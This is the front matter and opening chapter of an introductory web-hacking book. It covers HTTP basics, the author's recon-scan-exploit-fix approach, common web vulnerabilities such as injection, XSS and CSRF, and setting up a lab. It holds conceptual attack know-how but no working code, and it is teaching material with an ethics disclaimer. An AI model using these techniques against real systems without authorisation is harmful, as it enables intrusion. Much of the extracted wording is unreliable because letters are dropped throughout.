Acknowledgments
Honey Bear
To my wife, S amantha: We’ve come a long way since being scared teenagers expecting a
baby! Your support no ma er the projects I take on, your understanding no ma er how
much I complain, and your composure no ma er what comes at our family are legendary
and have kept our family chugging along.

Lizard
To my oldest daughter, Liz: Your work ethic, a ention to detail, and drive to succeed are
an inspiration to me. I ’m looking forward to the coming years as you take on your next
challenges, as I have no doubt you will succeed with flying colors!

Baby Bird
To my youngest daughter, Maddie: Your smile and playful nature always pick me up and
make me realize how good we have it. I f four open-heart surgeries won’t slow you down,
what excuse does anybody else have? Keep smiling, playing, and being yourself—we’re
all better off that way!

Family and Friends

Huge thanks to Merm, Tara, Halverto, S tacy & S teph, Luke & Tracy, D avid, D r. B, Cron
my D S U students, and everybody else that I ’ve surely forgo en that have provided
friendship and support. Salute!
A nd a special note to D r. Patrick Engebretson, a great friend and colleague, that I ’ve
shared many beers, fried goodies, stories, car rides, and oﬃce visits with. Your assistance
through this publishing process has been a tremendous help. Do work, big boy!
Last, to my parents, D r. Wayne and D r. Crystal Pauli: I t appears that those years of
twisting my ear, ﬁlling my mouth full of soap, and breaking wooden spoons on my bu
have ﬁnally paid oﬀ! (That stuﬀ was allowed in the 1980s and it’s obvious now that I
wasn’t the easiest child to raise.) Your love and support have never wavered and I
couldn’t ask for better parents.

Security Community

Man, what a group. I t doesn’t ma er if you’re a complete beginner, a super l33t hacker,
or anywhere in between, you’re always welcome if you’re willing to learn and explore. A s
a S outh D akota guy, I have my own personal “Mount Rushmore of S ecurity”: a group
that not only is highly skilled in security but also has provided me with a ton support.
■ To Dr. Jared DeMott: You’re one of the finest bug hunters/exploitation gurus in the
world, but an even better family man and friend. With all your success it would be
easy to forget about us “little people” at Dakota State University, but instead you’ve
never been a bigger supporter of our mission and goals.
■ To Dave Kennedy: HUGS! You’re one of the most encouraging security people that
I’ve ever come across. The amount of fun you have working, training, speaking, and
just hanging out with the security community is what this is all about. I’m glad our
paths crossed and I look forward to many more years of watching you continue to
flourish. MORE HUGS!
■ To Eric Smith: I will never forget watching in awe as you dominated as a one-man red
team for our security competition at DSU. Your personal story of hard work,
dedication, and hours spent perfecting your craft is one that I’ve relayed to my
students hundreds of times. Thanks for always making time to come back to Madison,
SD, and furthering your demigod status with our students!
■ To Dafydd Stuttard: I blame you for all of this! The Web Application Hacker’s Handbook
(WAHH) that you authored with Marcus Pinto was one of the first premiere security
books that I really dug into. After attending your classes, being the technical reviewer
on the 2nd edition of WAHH, using your Burp Suite web application hacking tool
extensively, and exchanging countless e-mails with you, it’s crystal clear that you’re
the Godfather of web application security. I’ve educated over 400 students with
WAHH and Burp Suite and hope my book can serve as an on-ramp to your super
highway.

Scott White—Technical Reviewer
A special thanks to S co White for doing a tremendous job reviewing and cleaning up
my work. With all the diﬀerent directions you get pulled and requests for your time, I
truly appreciate your expertise, timeliness, and honest feedback. This book is much
stronger because of your work!

Syngress Team
To all the ﬁne folks at S yngress that took a chance on me and provided nothing but the
best in service, feedback, and critiques in an uber-timely manner. Especially, Chris
Katsaropoulos and Ben Rearick—your professionalism and tact are greatly appreciated
and are the way an organization should operate.

My Vices

I n no particular order, I ’d like to thank corndogs, Patron S ilver, HO TEL32 at the Mont
Carlo in Las Vegas (especially @J ohnnyLasVegas and Pa y S anchez), Mickey’s mal
liquor, fantasy football, Pringles, and my 6-iron for helping me recharge.

Biography

D r. J osh Pauli received his Ph.D . in software engineering from N orth D akota S tate
University (N D S U) and now serves as an associate professor of cyber security at D akota
S tate University (D S U) in Madison, S D . D r. Pauli has published nearly 30 internationa
journal and conference papers related to software security and his work includes invited
presentations from D EFCO N , Black Hat, and The N ational S ecurity A gency. He teache
both undergraduate and graduate courses in software security at D S U and is the
program director for the D S U Cyber Corps. D r. Pauli also conducts web application
penetration tests for an information security consulting ﬁrm. You can keep up with J osh
on Twi er by following @CornD ogGuy and visiting his D S U homepage at
www.homepages.dsu.edu/paulij.

Foreword

The World Wide Web is a huge and expanding mass of application code. The majority of
businesses, governments, and other organizations are now on the web, exposing their
systems and data to the world via custom application functionality. With today’s
development frameworks, it is easier than ever to create a functional web application
without knowing or doing anything about security. With today’s technologies, that
application is likely to be far more complex than those that have come before. Evolving
technologies bring with them more a ack surface and new types of a ack. Meanwhile,
old vulnerabilities live on and are reintroduced into new applications by each generation
of coders.
I n the recent past, numerous high-proﬁle organizations have been compromised via
their web applications. Though their PR departments may claim they were victims of
highly sophisticated hackers, in reality the majority of these a acks have exploited
simple vulnerabilities that have been well understood for years. S maller companies that
don’t feel under the spotlight may actually be even more exposed. A nd many who are
compromised never know about it.
Clearly, the subject of web application security is more critical today than ever before.
There is a signiﬁcant need for more people to understand web application a acks, both
on the oﬀensive side (to test existing applications for ﬂaws) and on the defensive side (to
develop more robust code in the ﬁrst place). I f you’re completely new to web hacking,
this book will get you started. A ssuming no existing knowledge, it will teach you the
basic tools and techniques you need to ﬁnd and exploit numerous vulnerabilities in
today’s applications. I f your job is to build or defend web applications, it will open your
eyes to the a acks that your own applications are probably still vulnerable to and teach
you how to prevent them from happening.
Dafydd Stuttard
Creator of Burp Suite
Coauthor of The Web Application Hacker’s Handbook

Introduction
Many of us rely on web applications for so many of our daily tasks, whether at work, at
home, or at play, and we access them several times a day from our laptops, tablets,
phones, and other devices. We use these web applications to shop, bank, pay bills, a end
online meetings, social network with friends and family, and countless other tasks. The
problem is that web applications aren’t as secure as we’d like to think, and most of the
time the a acks used to gain access to a web application are relatively straightforward
and simple. I n fact, anyone can use widely available hacking tools to perform these
devastating web attacks.
This book will teach you how to hack web applications and what you can do to prevent
these a acks. I t will walk you through the theory, tools, and techniques used to identify
and exploit the most damaging web vulnerabilities present in current web applications.
This means you will be able to make a web application perform actions it was never
intended to perform, such as retrieve sensitive information from a database, bypass the
login page, and assume the identity of other users. You’ll learn how to select a target,
how to perform an a ack, what tools are needed and how to use them, and how to
protect against these attacks.

About This Book
This book is designed to teach you the fundamentals of web hacking from the ground up.
I t’s for those of you interested in ge ing started with web hacking but haven’t found a
good resource. Basically, if you’re a web hacking newbie, this is the book for you! This
book assumes you have no previous knowledge related to web hacking. Perhaps you have
tinkered around with some of the tools, but you don’t fully understand how or where
they fit into the larger picture of web hacking.
Top web hacking experts have a ﬁrm grasp on programming, cryptography, bug
hunting, exploitation development, database layout, data extraction, how network traﬃc
works, and much more. I f you don’t have these skills, don’t be discouraged! These
knowledge and skills are accumulated over the course of a career, and if you’re just
ge ing started with web hacking, you probably won’t have all of these skills. This book
will teach you the theory, tools, and techniques behind some of the most damaging web
a acks present in modern web applications. You will gain not only knowledge and skill
but also confidence to transition to even more complex web hacking in the future.

A Hands-On Approach

This book follows a very hands-on approach to introduce and demonstrate the content.
Every chapter will have foundational knowledge so that you know the why of the a ack
and detailed step-by-step directions so that you know the how of the attack.
O ur approach to web hacking has three speciﬁc targets: the web server, the web
application, and the web user. These targets all present diﬀerent vulnerabilities, so we
need to use diﬀerent tools and techniques to exploit each of them. That’s exactly what
this book will do; each chapter will introduce diﬀerent a acks that exploit these targets’
vulnerabilities.

What's in This Book?

Each chapter covers the following material:
Chapter 1: The Basics of Web Hacking provides an overview of current web
vulnerabilities and how our hands-on approach takes aim at them.
Chapter 2: Web S erver Hacking takes traditional network hacking methodologies and
applies them directly to the web server to not only compromise those machines but also
to provide a base of knowledge to use in a acks against the web application and web
user. Tools include Nmap, Nessus, Nikto, and Metasploit.
Chapter 3: Web A pplication Recon and S canning introduces tools, such as web proxies
and scanning tools, which set the stage for you to exploit the targeted web application by
ﬁnding existing vulnerabilities. Tools include Burp S uite (S pider and I ntercept) and Zed
Attack Proxy (ZAP).
Chapter 4: Web A pplication Exploitation with I njection covers the theory, tools, and
techniques used to exploit web applications with S Q L injection, operating system
command injection, and web shells. Tools include Burp S uite (speciﬁcally the functions
and features of the Proxy I ntercept and Repeater tools), sqlmap, J ohn the Ripper (J tR)
custom web shell files, and netcat.
Chapter 5: Web A pplication Exploitation with Broken Authentication and Path
Traversal covers the theory, tools, and techniques used to exploit web applications with
brute forcing logins, sessions a acks, and forceful browsing. Tools include Burp S uite
(I ntruder and S equencer) and various operating system commands for nefarious
purposes.
Chapter 6: Web User Hacking covers the theory, tools, and techniques used to exploit
other web users by exploiting web application cross-site scripting (XS S ) and cross-site
request forgery (CS RF) vulnerabilities as well as a acks that require no existing web
server or web application vulnerabilities, but instead prey directly on the user’s
willingness to complete dangerous actions. The main tool of choice will be S ocialEngineer Toolkit (SET).
Chapter 7: Fixes covers the best practices available today to prevent all the a acks
introduced in the book. Like most things security-related, the hard part is not identifying
these mitigation strategies, but instead on how to best implement and test that they are
doing what they are intended to do.
Chapter 8: N ext S teps introduces where you can go after ﬁnishing this book to

continue on your hacking journey. There are tons of great information security groups
and events to take part in. S ome of you may want formal education, while others may
want to know what certiﬁcations are especially applicable to this type of security work. A
quick list of good books to consider is also provided.

A Quick Disclaimer
The goal of this book is to teach you how to penetrate web servers, web applications, and
web users; protect against common a acks; and generally improve your understanding
of what web application security is. I n a perfect world, no one would use the tools and
techniques discussed in this book in an unethical manner. But since that’s not the case,
keep the following in mind as you read along:
Think before you hack.
Don’t do malicious things.
Don’t attack a target unless you have written permission.
Many of the tools and techniques discussed in this book are easily detected and traced.
I f you do something illegal, you could be sued or thrown into jail. O ne basic
assumption this book makes is that you understand right from wrong. N either S yngress
(this book’s publisher) nor I endorse using this book to do anything illegal. I f you break
into someone's server or web application without permission, don’t come crying to me
when your local law enforcement agency kicks your door in!

C H AP T E R 1

The Basics of Web Hacking

Chapter Rundown:
■ What you need to know about web servers and the HTTP protocol
■ The Basics of Web Hacking: our approach
■ Common web vulnerabilities: they are still owning us
■ Setting up a safe test environment so you don’t go to jail

Introduction

There is a lot of ground to cover before you start to look at speciﬁc tools and how to
conﬁgure and execute them to best suit your desires to exploit web applications. This
chapter covers all the areas you need to be comfortable with before we get into these
tools and techniques of web hacking. I n order to have the strong foundation you will
need for many years of happy hacking, these are core fundamentals you need to fully
understand and comprehend. These fundamentals include material related to the most
common vulnerabilities that continue to plague the web even though some of them have
been around for what seems like forever. S ome of the most damaging web application
vulnerabilities “in the wild” are still as widespread and just as damaging over 10 years
after being discovered.
I t’s also important to understand the time and place for appropriate and ethnical use
of the tools and techniques you will learn in the chapters that follow. A s one of my
friends and colleagues likes to say about using hacking tools, “it’s all fun and games
until the FBI shows up!” This chapter includes step-by-step guidance on preparing a
sandbox (isolated environment) all of your own to provide a safe haven for your web
hacking experiments.
A s security moved more to the forefront of technology management, the overall
security of our servers, networks, and services has greatly improved. This is in large part
because of improved products such as ﬁrewalls and intrusion detection systems that
secure the network layer. However, these devices do li le to protect the web application
and the data that are used by the web application. A s a result, hackers shifted to
a acking the web applications that directly interacted with all the internal systems, such
as database servers, that were now being protected by ﬁrewalls and other network
devices.
I n the past handful of years, more emphasis has been placed on secure software
development and, as a result, today’s web applications are much more secure than
previous versions. There has been a strong push to include security earlier in the
software development life cycle and to formalize the speciﬁcation of security
requirements in a standardized way. There has also been a huge increase in the
organization of several community groups dedicated to application security, such as the
O pen Web A pplication S ecurity Project. There are still blatantly vulnerable web
applications in the wild, mainly because programmers are more concerned about
functionality than security, but the days of easily exploiting seemingly every web
application are over.

Therefore, because the security of the web application has also improved just like the
network, the attack surface has again shifted; this time toward attacking web users. There
is very li le that network administrators and web programmers can do to protect web
users against these user-on-user a acks that are now so prevalent. I magine a hacker’s joy
when he can now take aim on an unsuspecting technology-challenged user without
having to worry about intrusion detection systems or web application logging and web
application ﬁrewalls. A ackers are now focusing directly on the web users and
eﬀectively bypassing any and all safeguards developed in the last 10 + years for networks
and web applications.
However, there are still plenty of existing viable a acks directed at web servers and
web applications in addition to the a acks targeting web users. This book will cover how
all of these a acks exploit the targeted web server, web application, and web user. You
will fully understand how these a acks are conducted and what tools are needed to get
the job done. Let’s do this!

What Is a Web Application?
The term “web application” has diﬀerent meanings to diﬀerent people. D epending on
whom you talk to and the context, diﬀerent people will throw around terms like web
application, web site, web-based system, web-based software or simply Web and all may
have the same meaning. The widespread adoption of web applications actually makes it
hard to clearly diﬀerentiate them from previous generation web sites that did nothing
but serve up static, noninteractive HTML pages. The termweb application will be used
throughout the book for any web-based software that performs actions (functionality)
based on user input and usually interacts with backend systems. When a user interacts
with a web site to perform some action, such as logging in or shopping or banking, it’s a
web application.
Relying on web applications for virtually everything we do creates a huge a ack
surface (potential entry points) for web hackers. Throw in the fact that web applications
are custom coded by a human programmer, thus increasing the likelihood of errors
because despite the best of intentions. Humans get bored, hungry, tired, hung-over, or
otherwise distracted and that can introduce bugs into the web application being
developed. This is a perfect storm for hackers to exploit these web applications that we
rely on so heavily.
O ne might assume that a web application vulnerability is merely a human error that
can be quickly ﬁxed by a programmer. N othing could be further from the truth: most
vulnerabilities aren’t easily ﬁxed because many web application ﬂaws dates back to early
phases of the software development lifecycle. I n an eﬀort to spare you the gory details of
software engineering methodologies, just realize that security is much easier to deal with
(and much more cost eﬀective) when considered initially in the planning and
requirements phases of software development. S ecurity should continue as a driving
force of the project all the way through design, construction, implementation, and
testing.

But alas, security is often treated as an afterthought too much of the time; this type of
development leaves the freshly created web applications ripe with vulnerabilities that
can be identified and exploited for a hacker’s own nefarious reasons.

What You Need to Know About Web Servers

A web server is just a piece of software running on the operating system of a server that
allows connections to access a web application. The most common web servers are
I nternet I nformation S ervices (I I S ) on a Windows server and A pache Hypertext Transfe
Protocol (HTTP) S erver on a Linux server. These servers have normal directory structure
like any other computer, and it’s these directories that house the web application.
I f you follow the Windows next, next, next, ﬁnish approach to installing an I I S web
server, you will end up with the default C:\Inetpub\wwwroot directory structure where
each application will have its own directories within wwwroot and all vital web
application resources are contained within it.
Linux is more varied in the ﬁle structure, but most web applications are housed in the
/var/www/ directory. There are several other directories on a Linux web server that are
especially relevant to web hacking:
■ /etc/shadow: This is where the password hashes for all users of the system reside. This
is the “keys to the kingdom”!
■ /usr/lib: This directory includes object files and internal binaries that are not intended
to be executed by users or shell scripts. All dependency data used by the application
will also reside in this directory. Although there is nothing executable here, you can
really ruin somebody’s day by deleting all of the dependency files for an application.
■ /var/*: This directory includes the files for databases, system logs, and the source code
for web application itself!
■ /bin: This directory contains programs that the system needs to operate, such as the
shells, ls, grep, and other essential and important binaries. bin is short for binary.
Most standard operating system commands are located here as separate executable
binary files.
The web server is a target for a acks itself because it oﬀers open ports and access to
potentially vulnerable versions of web server software installed, vulnerable versions of
other software installed, and misconﬁgurations of the operating system that it’s running
on.

What You Need to Know About HTTP

The HTTP is the agreed upon process to interact and communicate with a web
application. I t is completely plaintext protocol, so there is no assumption of security or
privacy when using HTTP. HTTP is actually a stateless protocol, so every client reques
and web application response is a brand new, independent event without knowledge of
any previous requests. However, it’s critical that the web application keeps track of client
requests so you can complete multistep transactions, such as online shopping where you

add items to your shopping cart, select a shipping method, and enter payment
information.
HTTP without the use of cookies would require you to relogin during each of those
steps. That is just not realistic, so the concept of a session was created where the
application keeps track of your requests after you login. A lthough sessions are a great
way to increase the user-friendliness of a web application, they also provide another
a ack vector for web applications. HTTP was not originally created to handle the type of
web transactions that requires a high degree of security and privacy. You can inspect all
the gory details of how HTTP operates with tools such as Wireshark or any local HTTP
proxy.
The usage of secure HTTP (HTTPS ) does li le to stop the types of a acks that will b
covered in this book. HTTPS is achieved when HTTP is layered on top of the S ecur
S ocket Layer/Transport Layer S ecurity (S S L/TLS ) protocol, which adds the TLS
S S L/TLS to normal HTTP request and responses. I t is best suited for ensuring man-in
the-middle and other eavesdropping a acks are not successful; it ensures a “private call”
between your browser and the web application as opposed to having a conversation in a
crowded room where anybody can hear your secrets. However, in our usage, HTTPS just
means we are going to be communicating with the web application over an encrypted
communication channel to make it a private conversation. The bidirectional encryption
of HTTPS will not stop our attacks from being processed by the waiting web application.

HTTP Cycles
O ne of the most important fundamental operations of every web application is the cycle
of requests made by clients’ browsers and the responses returned by the web server. I t’s
a very simple premise that happens many of times every day. A browser sends a request
ﬁlled with parameters (variables) holding user input and the web server sends a
response that is dictated by the submitted request. The web application may act based on
the values of the parameters, so they are prime targets for hackers to a ack with
malicious parameter values to exploit the web application and web server.

Noteworthy HTTP Headers

Each HTTP cycle also includes headers in both the client request and the server response
that transmit details about the request or response. There are several of these headers,
but we are only concerned with a few that are most applicable to our approach covered in
this book.
The headers that we are concerned about that are set by the web server and sent to the
client’s browser as part of the response cycle are:
■ Set-Cookie: This header most commonly provides the session identifier (cookie) to the
client to ensure the user’s session stays current. If a hacker can steal a user’s session
(by leveraging attacks covered in later chapters), they can assume the identity of the
exploited user within the application.

■ Content-Length: This header’s value is the length of the response body in bytes. This
header is helpful to hackers because you can look for variation in the number of bytes
of the response to help decipher the application’s response to input. This is especially
applicable when conducting brute force (repetitive guessing) attacks.
■ Location: This header is used when an application redirects a user to a new page. This
is helpful to a hacker because it can be used to help identify pages that are only
allowed after successfully authenticating to the application, for example.
The headers that you should know more about that are sent by the client’s browser as
part of the web request are:
■ Cookie: This header sends the cookie (or several cookies) back to the server to maintain
the user’s session. This cookie header value should always match the value of the setcookie header that was issued by the server. This header is helpful to hackers because
it may provide a valid session with the application that can be used in attacks against
other application users. Other cookies are not as juicy, such as a cookie that sets your
desired language as English.
■ Referrer: This header lists the webpage that the user was previously on when the next
web request was made. Think of this header as storing the “the last page visited.” This
is helpful to hackers because this value can be easily changed. Thus, if the application
is relying on this header for any sense of security, it can easily be bypassed with a
forged value.

Noteworthy HTTP Status Codes

A s web server responses are received by your browser, they will include a status code to
signal what type of response it is. There are over 50 numerical HTTP response codes
grouped into ﬁve families that provide similar type of status codes. Knowing what each
type of response family represents allows you to gain an understanding of how your
input was processed by the application.
■ 100s: These responses are purely informational from the web server and usually mean
that additional responses from the web server are forthcoming. These are rarely seen
in modern web server responses and are usually followed close after with another
type of response introduced below.
■ 200s: These responses signal the client’s request was successfully accepted and
processed by the web server and the response has been sent back to your browser.
The most common HTTP status code is 200 OK.
■ 300s: These responses are used to signal redirection where additional responses will
be sent to the client. The most common implementation of this is to redirect a user’s
browser to a secure homepage after successfully authenticating to the web
application. This would actually be a 302 Redirect to send another response that
would be delivered with a 200 OK.
■ 400s: These responses are used to signal an error in the request from the client. This
means the user has sent a request that can’t be processed by the web application,
thus one of these common status codes is returned: 401 Unauthorized, 403 Forbidden,

and 404 Not Found.
■ 500s: These responses are used to signal an error on the server side. The most
common status codes used in this family are the 500 Internal Server Error and 503
Service Unavailable.
Full details on all of the HTTP status codes can be reviewed in greater detail at
http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html.

The Basics of Web Hacking: Our Approach
O ur approach is made up of four phases that cover all the necessary tasks during an
attack.
1. Reconnaissance
2. Scanning
3. Exploitation
4. Fix
I t’s appropriate to introduce and discuss how these vulnerabilities and a acks can be
mitigated, thus there is a ﬁx phase to our approach. A s a penetration tester or ethical
hacker, you will get several questions after the fact related to how the discovered
vulnerabilities can be ﬁxed. Consider the inclusion of the ﬁx phase to be a resource to
help answer those questions.

Our Targets
O ur approach targets three separate, yet related a ack vectors: the web server, the web
application, and the web user. For the purpose of this book, we will deﬁne each of these
attack vectors as follows:
1. Web server: the application running on an operating system that is hosting the web
application. We are NOT talking about traditional computer hardware here, but
rather the services running on open ports that allow a web application to be
reached by users’ internet browsers. The web server may be vulnerable to network
hacking attempts targeting these services in order to gain unauthorized access to
the web server’s file structure and system files.
2. Web application: the actual source code running on the web server that provides the
functionality that web users interact with is the most popular target for web
hackers. The web application may be susceptible to a vast collection of attacks that
attempt to perform unauthorized actions within the web application.
3. Web user: the internal users that manage the web application (administrators and
programmers) and the external users (human clients or customers) of the web
applications are worthy targets of attacks. This is where a cross-site scripting (XSS)
or cross-site request forgery (CSRF) vulnerabilities in the web application rear
their ugly heads. Technical social engineering attacks that target web users and
rely on no existing web application vulnerabilities are also applicable here.
The vulnerabilities, exploits, and payloads are unique for each of these targets, so

unique tools and techniques are needed to efficiently attack each of them.

Our Tools
For every tool used in this book, there are probably ﬁve other tools that can do the same
job. (The same goes for methods, too.) We’ll emphasize the tools that are the most
applicable to beginner web hackers. We recommend these tools not because they’re easy
for beginners to use, but because they’re fundamental tools that virtually every
professional penetration tester uses on a regular basis. I t’s paramount that you learn to
use them from the very first day. Some of the tools that we’ll be using include:
■ Burp Suite, which includes a host of top-notch web hacking tools, is a must-have for
any web hacker and it’s widely accepted as the #1 web hacking tool collection.
■ Zed Attack Proxy (ZAP) is similar to Burp Suite, but also includes a free vulnerability
scanner that’s applicable to web applications.
■ Network hacking tools such as Nmap for port scanning, Nessus and Nikto for
vulnerability scanning, and Metasploit for exploitation of the web server.
■ And other tools that fill a specific role such as sqlmap for SQL injection, John the Ripper
(JtR) for offline password cracking, and the Social Engineering Toolkit (SET) for
technical social engineering attacks against web users!

Web Apps Touch Every Part of IT

A nother exciting tidbit for web hackers is the fact that web applications interact with
virtually every core system in a company’s infrastructure. I t’s commonplace to think that
the web application is just some code running on a web server safely tucked away in an
external D MZ incapable of doing serious internal damage to a company. There are
several additional areas of a traditional I T infrastructure that need to be considered in
order to fully target a system for a ack, because a web application’s reach is much wider
than the code wri en by a programmer. The following components also need to be
considered as possible attack vectors:
■ Database server and database: the system that is hosting the database that the web
application uses may be vulnerable to attacks that allow sensitive data to be created,
read, updated, or deleted (CRUD).
■ File server: the system, often times a mapped drive on a web server, that allows file
upload and/or download functionality may be vulnerable to attacks that allow server
resources to be accessed from an unauthorized attacker.
■ Third-party, off-the-shelf components: modules of code, such as content management
systems (CMSs), are a definitely a target because of the widespread adoption and
available documentation of these systems.

Existing Methodologies
S everal a ack methodologies provide the processes, steps, tools, and techniques that are
deemed to be best practices. I f you’re a white hat hacker, such activities are called
penetration testing (pen test for short or PT for even shorter), but we all realize they are
the same activities as black hat hacking. The two most widely accepted pen test
methodologies today are the O pen-Source Security Testing M ethodology M anual(OSSTM)
and the Penetration Testing Execution Standard (PTES).

The Open-Source Security Testing Methodology
Manual (OSSTM)

The OSSTM was created in a peer review process that created cases that test five sections:
1. Information and data controls
2. Personnel security awareness levels
3. Fraud and social engineering levels
4. Computer and telecommunications networks, wireless devices, and mobile devices
5. Physical security access controls, security process, and physical locations
The O S S TM measures the technical details of each of these areas and provides
guidance on what to do before, during, and after a security assessment. More
information on the O S S TM can be found at the project homepage at
http://www.isecom.org/research/osstmm.html.

Penetration Testing Execution Standard (PTES)

The new kid on the block is deﬁnitely the PTES , which is a new standard aimed at
providing common language for all penetration testers and security assessment
professionals to follow. PTES provides a client with a baseline of their own security
posture, so they are in a be er position to make sense of penetration testing ﬁndings.
PTES is designed as a minimum that needs to be completed as part of a comprehensive
penetration test. The standard contains many diﬀerent levels of services that should be
part of advanced penetration tests. More information can be found on the PTES
homepage at http://www.pentest-standard.org/.

Making Sense Of Existing Methodologies

Because of the detailed processes, those standards are quite daunting to digest as a
beginning hacker. Both of those standards basically cover every possible aspect of
security testing, and they do a great job. Tons of very smart and talented people have
dedicated countless hours to create standards for penetration testers and hackers to
follow. Their eﬀorts are certainly commendable, but for beginning hackers it’s sensory
overload. How are you going to consider hacking a wireless network when you may not
even understand basic network hacking to begin with? How are you going to hack a
mobile device that accesses a mobile version of a web application when you may not be
comfortable with how dynamic web applications extract and use data from a database?
What is needed is to boil down all the great information in standards such as the
O S S TM and PTES into a more manageable methodology so that beginning hackers aren’
overwhelmed. That’s the exact goal of this book. To give you the necessary guidance to
get you started with the theory, tools, and techniques of web hacking!

Most Common Web Vulnerabilities
O ur targets will all be exploited by a acking well-understood vulnerabilities. A lthough
there are several other web-related vulnerabilities, these are the ones we are going to
concentrate on as we work through the chapters.

Injection
I njection ﬂaws occur when untrusted user data are sent to the web application as part of
a command or query. The a acker’s hostile data can trick the web application into
executing unintended commands or accessing unauthorized data. I njection occurs when
a hacker feeds malicious, input into the web application that is then acted on (processed)
in an unsafe manner. This is one of the oldest a acks against web applications, but it’s
still the king of the vulnerabilities because it is still widespread and very damaging.
I njection vulnerabilities can pop up in all sorts of places within the web application
that allow the user to provide malicious input. S ome of the most common injection
attacks target the following functionality:

■ Structured query language (SQL) queries
■ Lightweight directory access protocol (LDAP) queries
■ XML path language (XPATH) queries
■ Operating system (OS) commands
A nytime that the user’s input is accepted by the web application and processed
without the appropriate sanitization, injection may occur. This means that the hacker can
inﬂuence how the web application’s queries and commands are constructed and what
data should be included in the results. This is a very powerful exploit!

Cross-Site Scripting (XSS)

Cross-S ite S cripting (XS S ) occurs when user input is accepted by the application as part
of a request and then is used in the output of the response without proper output
encoding in place for validation and sanitization. XS S allows a ackers to execute scripts
in the victim’s browser, which can hijack user sessions, act as a key logger, redirect the
user to malicious sites, or anything else a hacker can dream up! A hacker can inject
malicious script (often times J avaS cript, but it also could be VBS cript) that is then
rendered in the browser of the victim. Because this script is part of the response from the
application, the victim’s browser trusts it and allows the script to run.
XS S comes in two primary “ﬂavors”: reﬂected and stored. Reﬂected XS S is much more
widespread in web applications and is considered to be less harmful. The reason that
reﬂected XS S is considered less harmful isn’t because of what it can do, but because it’s a
one-time a ack where the payload sent in a reﬂected XS S a ack is only valid on that one
request. Think of reﬂected XS S as “whoever clicks it, gets it.” Whatever user clicks the
link that contains the malicious script will be the only person directly aﬀected by this
a ack. I t is generally a 1:1 hacker to victim ratio. The hacker may send out the same
malicious URL to millions of potential victims, but only the ones that click his link are
going to be affected and there’s no connection between compromised users.
Stored XSS is harder to find in web applications, but it’s much more damaging because
it persists across multiple requests and can exploit numerous users with one a ack. This
occurs when a hacker is able to inject the malicious script into the application and have it
be available to all visiting users. I t may be placed in a database that is used to populate a
webpage or in a user forum that displays messages or any other mechanism that stores
input. A s legitimate users request the page, the XS S exploit will run in each of their
browsers. This is a 1:many hacker to victim ratio.
Both flavors of XSS have the same payloads; they are just delivered in different ways.

Broken Authentication And Session Management
S essions are the unique identiﬁers that are assigned to users after authenticating and
have many vulnerabilities or attacks associated with how these identifiers are used by the
web application. Sessions are also a key component of hacking the web user.
A pplication functions related to authentication and session management are often not

implemented correctly, allowing a ackers to compromise passwords, keys, session
tokens, or exploit other implementation ﬂaws to assume other users’ identities.
Functionality of the web application that is under the authentication umbrella also
includes password reset, password change, and account recovery to name a few.
A web application uses session management to keep track of each user’s requests.
Without session management, you would have to log-in after every request you make.
I magine logging in after you search for a product, then again when you want to add it to
your shopping cart, then again when you want to check out, and then yet again when you
want to supply your payment information. S o session management was created so users
would only have to login once per visit and the web application would remember what
user has added what products to the shopping cart. The bad news is that authentication
and session management are afterthoughts compared to the original I nternet. There was
no need for authentication and session management when there was no shopping or bill
paying. S o the I nternet as we currently know it has been twisted and contorted to make
use of authentication and session management.

Cross-Site Request Forgery

CS RF occurs when a hacker is able to send a well-crafted, yet malicious, request to an
authenticated user that includes the necessary parameters (variables) to complete a valid
application request without the victim (user) ever realizing it.
This is similar to reﬂected XS S in that the hacker must coerce the victim to perform
some action on the web application. Malicious script may still run in the victim’s
browser, but CS RF may also perform a valid request made to the web application. S ome
results of CS RF are changing a password, creating a new user, or creating web
application content via a CMS . A s long as the hacker knows exactly what parameters are
necessary to complete the request and the victim is authenticated to the application, the
request will execute as if the user made it knowingly.

Security Misconfiguration
This vulnerability category speciﬁcally deals with the security (or lack thereof) of the
entire application stack. For those not familiar with the term “application stack,” it refers
to operating system, web server, and database management systems that run and are
accessed by the actual web application code. The risk becomes even more problematic
when security hardening practices aren’t followed to best protect the web server from
unauthorized access. Examples of vulnerabilities that can plague the web server include:
■ Out-of-date or unnecessary software
■ Unnecessary services enabled
■ Insecure account policies
■ Verbose error messages
Eﬀective security requires having a secure conﬁguration deﬁned and deployed for the
application, frameworks, application server, web server, database server, and operating

system. A ll these se ings should be deﬁned, implemented, and maintained, as many are
not shipped with secure defaults. This includes keeping all software up to date, including
all code libraries used by the application.

Setting Up a Test Environment

Before you dig into the tools and techniques covered in the book, it’s important that you
set up a safe environment to use. Because this is an introductory hands-on book, we’ll
practice all the techniques we cover on a vulnerable web application. There are three
main requirements you need to consider when se ing up a testing environment as you
work through the book.
1. Because you will be hosting this vulnerable web application on your own
computer, it’s critical that we configure it in a way that does not open your
computer up for attack.
2. You will be using hacking tools that are not authorized outside of your personal
use, so it’s just as critical to have an environment that does not allow these tools to
inadvertently escape.
3. You will surely “break” the web application or web server as you work your way
through the book, so it’s critical that you have an environment that you can easily
set up initially as well as “push the reset button” to get back to a state where you
know everything is set up correctly.
There are countless ways that you could set up and conﬁgure such an environment,
but for the duration of this book, virtual machines will be used. A virtual machine (VM),
when conﬁgured correctly, meets all three of our testing environment requirements. A
VM is simply a software implementation of a computing environment running on
another computer (host). The VM makes requests for resources, such as processing cycles
and RA M memory usage, to the host computer that allows the VM to behave in the same
manner as traditionally installed operating systems. However, a VM can be turned oﬀ,
moved, restored, rolled back, and deleted very easily in a ma er of just a few keystrokes
or mouse clicks. You can also run several diﬀerent VMs at the same time, which allows
you to create a virtualized network of VMs all running on your one host computer. These
factors make a virtualized testing environment the clear choice for us.
A lthough you have plenty of options when it comes to virtualization software, in this
book we’ll use the popular VMWare Player, available for free at http://www.vmware.com.
O wing to its popularity, there are many preconﬁgured virtual machines that we can use.
Having systems already in place saves time during setup and allows you to get into the
actual web hacking material sooner and with less hassle.
I f VMWare Player is not your preferred solution, feel free to use any virtualization
product that you are comfortable with. The exact vendor and product isn’t as important
as the ability to set up, configure, and run the necessary virtualized systems.
I n this book, we’ll work in one virtual machine that will be used both to host the
vulnerable web application (target) and to house all of our hacking tools (a acker).
BackTrack will be used for this virtual machine and is available for download at the

BackTrack Linux homepage, located at http://www.backtrack-linux.org/downloads/.
Today, BackTrack is widely accepted as the premiere security-oriented operating
system. There are always eﬀorts to update and improve the hacker’s testing environment
and the recent release of Kali Linux is sure to gain widespread popularity. However, we
